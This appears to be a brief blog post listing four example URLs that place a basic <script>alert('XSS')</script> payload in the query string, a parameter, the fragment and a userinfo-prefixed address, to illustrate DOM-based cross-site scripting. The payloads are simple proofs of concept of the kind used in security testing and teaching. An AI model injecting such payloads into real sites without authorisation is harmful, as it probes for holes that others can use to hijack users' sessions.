DOM Based Cross Site Scripting

DOM XSS Example 1:
http://evilsql.com/main/page5.php?<script>alert(‘XSS’)</script> 

DOM XSS Example 2:
http://evilsql.com/main/page5.php?name=<script>alert(‘XSS’)</script> 

DOM XSS Example 3:
http://evilsql.com/main/page5.php?#<script>alert(‘XSS’)</script> 

DOM XSS Example 4:
http://nobody@evilsql.com/main/page5.php?<script>alert(‘XSS’)</script> 

DOM Echo:

http://www.evilsql.com/main/page5.php

Advertisement

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.